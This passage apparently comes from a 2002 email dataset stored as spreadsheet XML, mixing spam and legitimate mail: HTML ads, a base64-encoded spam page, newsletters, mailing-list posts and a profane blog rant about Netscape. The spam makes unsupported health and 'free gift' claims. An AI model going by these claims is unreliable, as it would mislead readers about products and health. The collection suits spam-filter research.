                       &lt;td height=3D"18"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;=20
                   &lt;table width=3D"100%" height=3D"83%" border=3D"0" align=
 =3D"center" cellpadding=3D"0" cellspacing=3D"0"&gt;
                     &lt;tr&gt;=20
                       &lt;td&gt;=20
                         &lt;table border=3D"0" cellspacing=3D"0" cellpadding=
 =3D"0" align=3D"right" height=3D"100%" width=3D"100%"&gt;
                           &lt;tr&gt;=20
                             &lt;td&gt;=20
                               &lt;p&gt; &lt;iframe src=3D"http://www.360ec.com/epost=
 /feng/my.htm" name=3D"content" id=3D"content" scrolling=3D"no" width=3D"98%=
 " height=3D"100%" marginwidth=3D"0" marginheight=3D"0" frameborder=3D"0" al=
 ign=3D"default"&gt;&lt;/iframe&gt;=20
                               &lt;/p&gt;
                             &lt;/td&gt;
                           &lt;/tr&gt;
                         &lt;/table&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"0=
 "&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"241"&gt;
 &lt;/td&gt;
           &lt;td width=3D"1" bgcolor=3D"#70AED6"&gt;&lt;img src=3D"http://www.360ec.=
 com/epost/feng/images/top5.gif"&gt;&lt;/td&gt;
           &lt;td width=3D"536" height=3D"43"&gt;&lt;div align=3D"center"&gt;&lt;font size=
 =3D"2"&gt;&lt;br&gt;
               &lt;/font&gt;=20
               &lt;table width=3D"96%" border=3D"0" cellspacing=3D"0" cellpaddi=
 ng=3D"0"&gt;
                 &lt;tr&gt;=20
                   &lt;td height=3D"75"&gt;&lt;span class=3D"a"&gt;&lt;font size=3D"2"&gt;TEL:=
  00-86-760-2345350=20
                     FAX: 00-86-760-2345350&lt;br&gt;
                     MOBILE :(00-86) 13703047547 MR. DAVID&lt;/font&gt;&lt;/span&gt;&lt;fon=
 t size=3D"2"&gt;&lt;br&gt;
                     &lt;a href=3D"mailto:sunfrom@chinalightingmarket.com" clas=
 s=3D"b"&gt;E-MAIL:=20
                     sunfrom@chinalightingmarket.com&lt;/a&gt;&lt;br&gt;
                     &lt;span class=3D"a"&gt;ADD: ROOM401, NO.19,XINXINGZHONGROAD,=
  GUZHEN,=20
                     ZHONGSHAN, GUANGDONG, CHINA&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
              =20
             &lt;/div&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#70AED6"&gt;=20
           &lt;td height=3D"16" colspan=3D"3"&gt;&amp;nbsp;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td height=3D"24" colspan=3D"3"&gt;&lt;div align=3D"right" class=3D"d"&gt;
 =09=09  &lt;div id=3D"Layer1" style=3D"position:absolute; width:77px; height:5=
 8px; z-index:1; left: 172px; top: 362px; visibility: hidden;"&gt;=20
               &lt;script&gt;var tc_user=3D"sunfrom";var tc_class=3D"4";&lt;/script&gt;
               &lt;script src=3D"http://stat.t2t2.com/stat.js"&gt;&lt;/script&gt;
             &lt;/div&gt;
 &lt;div id=3D"Layer2" style=3D"position:absolute; width:77px; height:58px; z-i=
 ndex:1; left: 172px; top: 362px; visibility: hidden;"&gt;=20
                &lt;script src=3D"http://www.360cn.com/designer6/counter/count.=
 asp?user=3Dsunfrom&amp;userid=3D55"&gt;&lt;/script&gt;
 =09=09=09    &lt;/div&gt;
 =09=09  &lt;font size=3D"2"&gt;&lt;a href=3D"http://www.360cn.com" target=3D"_blank"=
  class=3D"b"&gt;power=20
               by 360cn.com=A1=A1&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt; &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;map name=3D"Map"&gt;
   &lt;area shape=3D"rect" coords=3D"19,36,136,80" href=3D"http://www.chinaligh=
 tingmarket.com/company.htm" target=3D"_blank"&gt;
 &lt;/map&gt;
 &lt;map name=3D"Map2"&gt;
   &lt;area shape=3D"rect" coords=3D"20,14,134,51" href=3D"http://www.chinaligh=
 tingmarket.com/bc_list.asp" target=3D"_blank"&gt;
 &lt;/map&gt;
 &lt;map name=3D"Map3"&gt;
   &lt;area shape=3D"rect" coords=3D"20,-10,135,40" href=3D"http://www.chinalig=
 htingmarket.com/feedback.htm" target=3D"_blank"&gt;
 &lt;/map&gt;
 &lt;map name=3D"Map4"&gt;
   &lt;area shape=3D"rect" coords=3D"26,54,79,111" href=3D"http://www.chinaligh=
 tingmarket.com"&gt;
 &lt;/map&gt;
 &lt;map name=3D"Map5"&gt;
   &lt;area shape=3D"rect" coords=3D"26,-15,78,18" href=3D"http://www.chinaligh=
 tingmarket.com"&gt;
 &lt;/map&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Non-Integer Power Function on the Pixel Shader
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,6436947,159/
 Date: 2002-08-01T09:04:55+01:00
 This feature, excerpted from Wolfgang Engel's ShaderX book from Wordware 
 Publishing, presents a simple shader trick that performs a good per pixel 
 approximation of a non-integer power function. The technique works for input 
 values between 0 and 1 and supports large exponents. The presented shader does 
 not require any texture look-up and is scalable, making it possible to spend 
 more instructions in order to decrease the error or to reach greater exponents.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Enron finance chief is handcuffed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/215,7,215/
 Date: 2002-10-03T04:21:00+01:00
 *Business:* Federal prosecutors in the US have filed charges against the 
 highest ranking Enron executive yet.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Webdev] Very nice tool
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 Hi all, 
 Normally I would not post such things, but this is really cool for a
 visual idea of how ppl are linking to you
 http://www.touchgraph.com/TGGoogleBrowser.html
 It may not work from the submit button, but one the java appelet is
 loaded then try your URL. Its really quite nice.
 Aj
 - ----------------------------------------
 AJ McKee
 NMTB media
 Phone: (Europe) +353 1 473 53 72
        (North America) +1 206 339 4326
 Fax:   (Europe) +353 1 473 53 73
        (North America) +1 206 339 4326
 Website: http://www.nmtbmedia.com
 - -----------------------------------------
 -----BEGIN PGP SIGNATURE-----
 Version: PGPfreeware 6.5.8 for non-commercial use &lt;http://www.pgp.com&gt;
 Comment: PGP/GPG Keys located at http://www.nmtbmedia.com/keys/
 iQA/AwUBPWQpnIHmA/TOOP95EQLE6gCcDlPEdah2rBmwTNUixPi4aung3g8AoJTK
 llXGK8OOdlMSV/0o3YynpOEa
 =Kxad
 -----END PGP SIGNATURE-----
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Portable RPMs
</t>
  </si>
  <si>
    <t xml:space="preserve">Halloechen!
 If I create an RPM according to one of the how-to's with having
 Red Hat in mind, how big are my chances that it will also work
 for the SuSE distribution, or others?  (I don't know how many
 base on the RPM system.)
 Or what must I pay attention to when creating an RPM that should
 work with the big distributions?
 Tschoe,
 Torsten.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Validation
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.mozillazine.org/weblogs/hyatt/#85395270
 Date: Not supplied
 I feel so tremendously validated right now in all my criticisms of Netscape vs. 
 Mozilla. I told Netscape management that if the Netscape beta shipped without 
 popup blocking that CNet would write an article on it. They didn't believe me 
 (or didn't care). Sure enough, the article appeared right on time[1].
 I blogged about two main annoyances when installing Netscape 7: the lack of 
 popup blocking and all of the annoying advertising spam on the desktop and in 
 the toolbars. I warned Netscape that they needed to take steps to correct this 
 problem. They didn't listen. Take a look at the CNet review[2] highlight that 
 describes *The Bad* part of Netscape 7.0:
 _Displays AOL ads everywhere; doesn't let you turn off pop-up windows like 
 Mozilla does; devours 30MB of disk space._
 Plenty of other engineers at Netscape (as well as managers) complained about 
 these problems and fought with those higher up to correct these problems. We 
 lost every battle. The simple truth is that the people in charge of running the 
 Netscape browser are incompetent. They don't understand how to make a good 
 browser, or they don't care. Their engineers tell them what they're doing 
 wrong, and they don't listen. 
 Maybe you'll listen to the public. How about eWeek's article, Netscape 7.0 
 Shrivels Under Mozilla's Shadow[3]? Are you paying attention now, you ignorant, 
 stupid, incompetent buffoons?
 "I told you so." never felt so good.
 Maybe they will sit up and take notice now. If they do, well, it's about 
 fucking time. And people wonder why I quit working for AOL.
 [1] http://news.com.com/2100-1023-949572.html?tag=fd_lede
 [2] http://www.cnet.com/software/0-3227883-8-20331576-1.html?tag=st.sw.8888.boxhl.3227883-8-20331576-1
 [3] http://www.eweek.com/article2/0,3959,493248,00.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?=A4W=A6=B8=ACO=A7A=A7=E4=A7=DA=B6=DC=3F?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_vt4s7Ki1w4kkBCQawg
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_vt4s7Ki1w4kkBCQawgAA"
 ------=_NextPart_vt4s7Ki1w4kkBCQawgAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29u
 dGVudD0iemgtdHciPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0
 ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFUT1IiIGNvbnRlbnQ9
 Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4wIj4NCjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVudD0i
 RnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+pnCm86ZirmGkpKdRpc669Lj0rd3C
 vrPQt348L3RpdGxlPg0KPC9oZWFkPg0KDQo8Ym9keT4NCg0KPHA+PGI+PGZvbnQgc2l6ZT0iNCIg
 Y29sb3I9IiMwMDgwMDAiPqZwpvOmYq5hpKSnUaXOuvS49K3dwr6z0Ld+Jm5ic3A7ICAgIA0KLKSj
 qPypyqdPICwgpn7E1iAsIK7JtqEgLCCmYcJJICwgra2o7iAhITwvZm9udD48L2I+PC9wPiAgIA0K
 PHA+PGZvbnQgc2l6ZT0iNCI+NC8yMjwvZm9udD48Zm9udCBzaXplPSI1Ij4mbmJzcDsmbmJzcDs8
 L2ZvbnQ+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICAgIA0KPGZvbnQgY29sb3I9IiMw
 MDAwRkYiPjxiPjxmb250IHNpemU9IjUiPlRWQlM8L2ZvbnQ+PC9iPiZuYnNwOyZuYnNwOyZuYnNw
 OzwvZm9udD4mbmJzcDsgICAgDQqkziZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw
 OyA8Zm9udCBzaXplPSI1IiBjb2xvcj0iIzAwMDBGRiI+PGI+qka0y7dzu0QmbmJzcDs8L2I+PC9m
 b250PiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAgICANCsFwpliz+L7JPC9wPg0KPHA+PGZvbnQg
 Y29sb3I9IiNGRjAwMDAiPjxiPq74tk+0Tq/gs9C3fqq6r3WkSK91qMYgISE8L2I+PC9mb250Pjwv
 cD4gICANCjxwPjxmb250IGNvbG9yPSIjRkYwMDAwIj48Yj6kUaTAxMGquq7JtqGlsql3r+CssKdB
 qrqlzalStn2x0qV0pECusLWhPC9iPjwvZm9udD48L3A+DQo8cD669Kd9LS0tLS0tLTxhIGhyZWY9
 Imh0dHA6Ly90aWdob25nLmg4aC5jb20udHciPmh0dHA6Ly90aWdob25nLmg4aC5jb20udHc8L2E+
 PC9wPg0KPHA+pnCqR711pFekSLzGuUymaL3QtXmr4aT5qOg8L3A+DQo8cD6pzqq9sbXCSb/vpXi7
 eaqpPC9wPg0KPHA+r6ynQaaopVw8L3A+DQo8cD6hQDwvcD4NCg0KPC9ib2R5Pg0KDQo8L2h0bWw+
 ------=_NextPart_vt4s7Ki1w4kkBCQawgAA--
 ------=_NextPart_vt4s7Ki1w4kkBCQawg--
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; For example, take the recent CBC Olympics site: I needed to roll
 &gt; together a telnet client with a tokenizer, perl-regex preprocessing a
 &gt; stream to produce parseable XML, project that XML into relational
 &gt; databases using only the DTD to generate the rdbms schema, and open an
 &gt; XMLRPC interface to read and post items into the news stream.  Where
 &gt; can I find C libs for those components?
 You open sourced the new components you developed for this project, so the
 next person who comes along won't have to reimplement them, right?
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BUG REVIEW
</t>
  </si>
  <si>
    <t xml:space="preserve">____________________________________________________________ 
 T H E . M O U T H P I E C E  Monday, August 19th, 2002 
 ____________________________________________________________ 
 Do you enjoy this publication? Then give your friends a FREE 
 GIFT SUBSCRIPTION to it today. Just click below and 
 "Shag-a-Friend"! 
 http://www.sendoutmail.com/shag_friend2.asp?l=mouthpiece
 &lt;a href="http://www.sendoutmail.com/shag_friend2.asp?l=mouthpiece"&gt; 
 Give a Gift Subscription! &lt;/a&gt;
 ____________________________________________________________ 
 To SUBSCRIBE: http://www.shagmail.com/sub/mouthpiece.html 
 To UNSUBSCRIBE: http://www.shagmail.com/unsub/mouthpiece.html 
 To COMMENT, write to &lt; editor@the-mouth.com &gt; 
                      AOL Links: 
 &lt;a href="http://www.shagmail.com/sub/mouthpiece.html"&gt;Subscribe&lt;/a&gt; 
 &lt;a href="http://www.shagmail.com/unsub/mouthpiece.html"&gt;Unsubscribe&lt;/a&gt; 
 &lt;a href="mailto:editor@the-mouth.com"&gt;Email the Editor&lt;/a&gt; 
 ____________________________________________________________ 
 [m]  q u o t e s . o f . t h e . d a y 
 "A Houston woman has been arrested for running over her 
 husband three times and killing him with her Mercedes.  The 
 woman claims it was an accident. Three times.  That shows you 
 what a smooth ride the Mercedes is."
 	-Jay Leno
 "Its been reported that the couple from ABCs reality show 
 "The Bachelor," has broken up.  Its not surprising since 
 studies show that 60% of fake TV marriages end in divorce."
 	-Conan O'Brien
 "You know 'that look' women get when they want sex? Me 
 neither."
 	-Steve Martin
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ sponsor ~~~~ 
       Say Goodbye To Pain...It's As Easy As 1-2-3!
    * -   COMPARE &amp; SAVE $20.00 to the TV Product   - *
 Don't let chronic pain stop you from enjoying life! Introducing 
 New and Improved Blue Ease Pain Reliever. You've seen similar 
 products selling on TV for as much as $39.99. Why pay that 
 much when you can get better results for half the price? 
 Simply apply Blue Ease to the targeted area and within 
 minutes the pain vanishes. Blue Ease is Great For:
 * Arthritis             * Insect stings/Spider bites
 * Lower back pain       * Migraine Headaches
 * Sore muscles          * Knee, hip, shoulder, hand pain
 * Burns &amp; Sunburn       * Sports injuries, strains &amp; sprains
 PLUS, Blue Ease is GUARANTEED to work for you! If it doesn't
 just return the unused portion for a refund. Order a 4 oz jar 
 today for only $19.99, a savings of $20.00, by visiting: 
 http://pulsetv.com/dw/blue.asp?aid=586&amp;ent=696&amp;email=mothlight@fastmail.fm
 &lt;a href="http://pulsetv.com/dw/blue.asp?aid=586&amp;ent=696&amp;email=mothlight@fastmail.fm"&gt;
 Blue Ease&lt;/a&gt;  
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 [m] h u m o r . s i t e s 
     ^^^^^^^^^^^^^^^^^^^^^ 
 BUG REVIEW
 This website provides you with any kind of information you 
 need to know about bugs. Search by the insects name or by 
 location such as lawns and turfs, flowers, and trees and 
 scrubs. This website comes in handy when trying to figure out 
 what kind of weird bugs you have around the house.
 http://www.urbanext.uiuc.edu/bugreview/index.html
 -&lt;&gt;-
 MYSTERY PHOTO
 Visit each week to see if you can identify the object(s) in 
 the mystery photo. It may be a close-up of some ordinary object 
 or setting, or something photographed at an odd angle or in an 
 unusual setting, or some unusual object. 
 If you think you know what it is, enter your answer in our 
 drawing.  A winner will be chosen each week from among the 
 correct entries. 
 http://www.mysteryphoto.com
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ sponsor ~~~~ 
      An Exquisite Genuine Blue-Topaz Necklace for FREE? 
 UNBELIEVABLE! While supplies last, we are giving away these 
 stunning Genuine Blue Topaz Necklaces - FREE! (you cover the 
 s&amp;h of $4.97)! 
 This exquisitely cut Blue Topaz stone will make heads turn. A 
 stunning pendant that is accented by a stylish, 18" manmade 
 gold chain, this gorgeous necklace makes a wonderful gift for 
 a friend - or especially for yourself!
 BUT YOU MUST ACT RIGHT NOW! Due to an overwhelming response to 
 this FREE offer there's no telling when our inventory will run 
 out. Sorry -- limit 4 per order. GET YOUR FREE NECKLACE NOW: 
          http://ads.pulsetv.com/al/a?aid=586&amp;ent=183 
 &lt;a href="http://ads.pulsetv.com/al/a?aid=586&amp;ent=183"&gt; 
 Click Here&lt;/a&gt; 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 [m]  b i t s . n . b o b s 
      ^^^^^^^^^^^^^^^^^^^^^ 
 Things You'll Never Hear A Man Say...
 1. I just love how Barry Manilow sings, don't you?
 2. No, I don't want another beer. I have to work tomorrow.
 3. You know, her breasts are just too big for my liking.
 4. Sometimes I just want to be held.
 5. Boy, that Barbara Walters on "20/20" is one sexy babe.
 6. Sure, honey! I'd be happy to discuss the state of our 
    relationship.
 7. We haven't been to the mall for ages. Let's go shopping and 
    I can hold your purse.
 8. Forget Monday Night Football. Let's watch something 
    meaningful on the "Lifetime Channel."
 9. It's late. Put your clothes back on and I'll take you home.
 10. Honey, I'm going to the store. Do you need more tampons?
 11. Actually, I prefer it when *you* hold the remote.
 12. I'm sick of beer. Give me a fruit juice.
 13. Great! Your mother's coming to stay with us again.
 14. I wonder if my gorgeous neighbour knows that her drapes are 
    open when she's getting ready for bed. Maybe I should tell 
    her.
 15. No way. You weeded the garden last week. It's my turn.
 16. Better get rid of these old Playboy magazines. I don't 
    look at them any more.
 17. I understand.
 18. This movie has way too much gratuitous nudity.
 19. Damn, we're late for church!
 20. No! I don't want to see your sister's breasts.
 21. Damn these onions, pass me a tissue.
 22. Put some panties on, for Pete's sake.
 23. Eat something! You are starting to look like a Victoria's 
    Secret Model!
 24. Don't pick that up, I got it.
 25. Happy Anniversary!
 26. Hey, isn't today your Mother's birthday?
 27. Let's talk. I miss talking.
 28. Gay men have rights too!
 29. I am just too tired to have sex again today!
 30. Are you losing weight, sweetie?
 _________________________________________________________ 
 LINKS FOR AOL MEMBERS 
 Today's Humor Sites: 
 &lt;a href="http://www.urbanext.uiuc.edu/bugreview/index.html"&gt;
 BUG REVIEW&lt;/a&gt;
 &lt;a href="http://www.mysteryphoto.com"&gt;MYSTERY PHOTO&lt;/a&gt;
 ------------------------------------------------------------ 
 t h e . m o u t h p i e c e 
 SUBSCRIBE/UNSUBSCRIBE instructions are at the TOP of this 
 issue. 
 ____________________________________________________________ 
 END OF THE MOUTHPIECE - Another FREE ShagMail publication   
 FREE fun in your mailbox every day!! Check out Shagmail.com 
 &lt;a href="http://www.shagmail.com/"&gt;FREE Newsletters&lt;/a&gt; 
 Copyright 2002 by Pulse Direct, Inc. All rights reserved. 
 Feel free to forward this, in its entirety, to others. 
 ---
 You are currently subscribed to mouthpiece as: mothlight@fastmail.fm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Call me                    93910
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "BidsToGo" is places to go, things to do
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-us"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;Hello from BidsToGo.biz&lt;/title&gt;
 &lt;style&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;table border=0&gt;
   &lt;tr&gt;
     &lt;td width='60%'&gt;&lt;font size="4"&gt;Hello, &lt;/font&gt;&lt;/td&gt;
     &lt;td&gt;
     &lt;div align=center style="border-style: solid; border-width: 1; border-color:gray; padding-left: 4; padding-right: 4; padding-top: 1; padding-bottom: 1"&gt;
       &lt;font face="Arial" size="1"&gt;&lt;u&gt;Privacy policy&lt;/u&gt;: To 
       permanently opt out of our mailings simply 
       send a blank email to &lt;a href="mailto:optout@bidstogo.biz?subject=Optout"&gt;optout@bidstogo.biz&lt;/a&gt;.&lt;/font&gt;&lt;/div&gt;
     &lt;/td&gt;
    &lt;td width=50&gt;&amp;nbsp; 
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font size="4"&gt;&lt;a href="http://www.bidstogo.biz/"&gt;BidsToGo&lt;/a&gt; invites you 
 visit and explore&amp;nbsp;
 &lt;a href="http://www.bidstogo.biz/"&gt;http://www.bidstogo.biz/&lt;/a&gt;, the site 
 dedicated to &lt;font color="blue"&gt; &lt;i&gt;places to go&lt;/i&gt;&lt;/font&gt; and
 &lt;font color="blue"&gt; &lt;i&gt;things to do&lt;/i&gt;&lt;/font&gt;. You can use
 &lt;a href="http://www.bidstogo.biz/"&gt;BidsToGo&lt;/a&gt; to advertise, sell or auction 
 places to go and things to do - and right now it is FREE to make a basic 
 listing.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="4"&gt;&lt;a href="http://www.bidstogo.biz/"&gt;BidsToGo&lt;/a&gt; is great for&lt;/font&gt;&lt;br&gt;
 &amp;nbsp;&lt;table border="0" cellpadding="5" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1"&gt;
   &lt;tr&gt;
     &lt;td width="50%" align="center"&gt;&lt;font color="#0000FF"&gt;&lt;b&gt;Lodging&lt;/b&gt;&lt;/font&gt;
     &lt;div align="center"&gt;
       &lt;font face="serif" size="3"&gt;Hotels, bed &amp;amp; breakfasts, resorts, 
       timeshares, vacation rentals, etc.&lt;/font&gt;
     &lt;/div&gt;
     &lt;/td&gt;
     &lt;td width="50%" align="center"&gt;&lt;b&gt;&lt;font color="#0000FF"&gt;Travel&lt;/font&gt;&lt;/b&gt;
     &lt;div align="center"&gt;
       &lt;font face="serif" size="3"&gt;Cruises, yacht charters, rail tours, auto 
       rental, etc.&lt;/font&gt;
     &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="50%" align="center"&gt;&lt;b&gt;&lt;font color="#0000FF"&gt;Vacation packs
     &lt;/font&gt;&lt;/b&gt;
     &lt;div align="center"&gt;
       &lt;font face="serif" size="3"&gt;Skiing, outfitters, hunting, fishing, golf, abroad, resorts, 
       etc.&lt;/font&gt;
     &lt;/div&gt;
     &lt;/td&gt;
     &lt;td width="50%" align="center"&gt;&lt;font color="#0000FF"&gt;&lt;b&gt;Game tickets&lt;/b&gt;
     &lt;/font&gt; &lt;font face="serif" size="3"&gt;&lt;b&gt;
     &lt;br&gt;
     &lt;/b&gt;Football, baseball, basketball, hockey, etc.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="50%" align="center"&gt;&lt;font color="#0000FF"&gt;&lt;b&gt;Events and Festivals&lt;/b&gt;&lt;/font&gt;&lt;div align="center"&gt;
       Festivals, events, tournaments, races, bowl games, parades, etc.&lt;/div&gt;
     &lt;/td&gt;
     &lt;td width="50%" align="center"&gt;&lt;font color="#0000FF"&gt;&lt;b&gt;Theme parks&lt;/b&gt;&lt;/font&gt;
     &lt;div align="center"&gt;
       &lt;font face="serif" size="3"&gt;Disney World, Busch Gardens, Kings Dominion, 
       Sea World, etc.&lt;/font&gt;
     &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="50%" align="center"&gt;&lt;font color="#0000FF"&gt;&lt;b&gt;Concerts&lt;/b&gt;&lt;/font&gt;
     &lt;div align="center"&gt;
       &lt;font face="serif" size="3"&gt;Musical concerts&lt;/font&gt;
     &lt;/div&gt;
     &lt;/td&gt;
     &lt;td width="50%" align="center"&gt;&lt;font color="#0000FF"&gt;&lt;b&gt;Theater&lt;/b&gt;&lt;/font&gt;
     &lt;div align="center"&gt;
       &lt;font face="serif" size="3"&gt;Plays, operas, musicals, etc.&lt;/font&gt;
     &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="50%" align="center"&gt;&lt;font color="#0000FF"&gt;&lt;b&gt;Training&lt;/b&gt;&lt;/font&gt;&lt;div align="center"&gt;
       &lt;font face="serif" size="3"&gt;Professional or personal training&lt;/font&gt;&lt;/div&gt;
     &lt;/td&gt;
     &lt;td width="50%" align="center"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font size="4"&gt;Visit &lt;a href="http://www.bidstogo.biz/"&gt;http://www.bidstogo.biz/&lt;/a&gt;.&lt;/font&gt;&lt;/p&gt;
 &lt;hr width="50%"&gt;
 &lt;p align="center"&gt;&amp;nbsp;
 &lt;div align=center&gt;
 &lt;div style="border:1px solid gray; padding-left: 4; padding-right: 4; padding-top: 1; ; padding-bottom: 1;width:70%"&gt;
       &lt;font face="Arial" size="1"&gt;&lt;u&gt;Privacy policy&lt;/u&gt;: To 
       permanently opt out of our mailings simply 
       send a blank email to &lt;a href="mailto:optout@bidstogo.biz?subject=Optout"&gt;optout@bidstogo.biz&lt;/a&gt;. 
       Contact
       &lt;a href="mailto:CustomerService@bidstogo.biz?subject=Privacy policy question"&gt;CustomerService&lt;/a&gt; 
       for more information.&lt;/font&gt;&lt;/div&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Personal laser picks for students, SOHO users, and more! (ZDNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Buyer's Alert | July 16, 2002&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt; 
 &lt;CENTER&gt;&lt;A name=top&gt;&lt;/A&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#232850 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=bottom&gt;
     &lt;TD width=440 colSpan=4&gt;&lt;IMG height=60 alt="ZDNet Buyers Alert Newsletter" 
       src="http://www.cnet.com/i/sh/nl/hd_buyers_alert.gif" width=440&gt;&lt;/TD&gt;
     &lt;TD vAlign=top align=middle width=160 bgColor=#ffffff rowSpan=2&gt;&lt;!-- ad --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWurdeBn7NWtUoF24wxeeR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/Toshiba.sky.price.perform.pleasure.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /ad --&gt;&lt;!-- rebates --&gt;
 &lt;br&gt;&lt;img src="http://www.cnet.com/i/nl/zd-ba/rebates.gif" width=160 height=18 alt="Rebates"&gt;&lt;br&gt;
 &lt;table width=160 bgcolor="#eeeeee" cellpadding=5 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2"&gt;When ordering, make sure the reseller/manufacturer 
 provides the rebate coupon you need.
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 5, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTbVm_vzGZP85eXsJh-PR" &gt;$50 off Cidco Mailstation with subscription&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires July 31, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqr3GOW-0pvVdi5Z7ednR" &gt;Get a car cassette adapter and power adapter FREE with Rio Volt SP250&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires August 31, 2002&lt;br&gt;
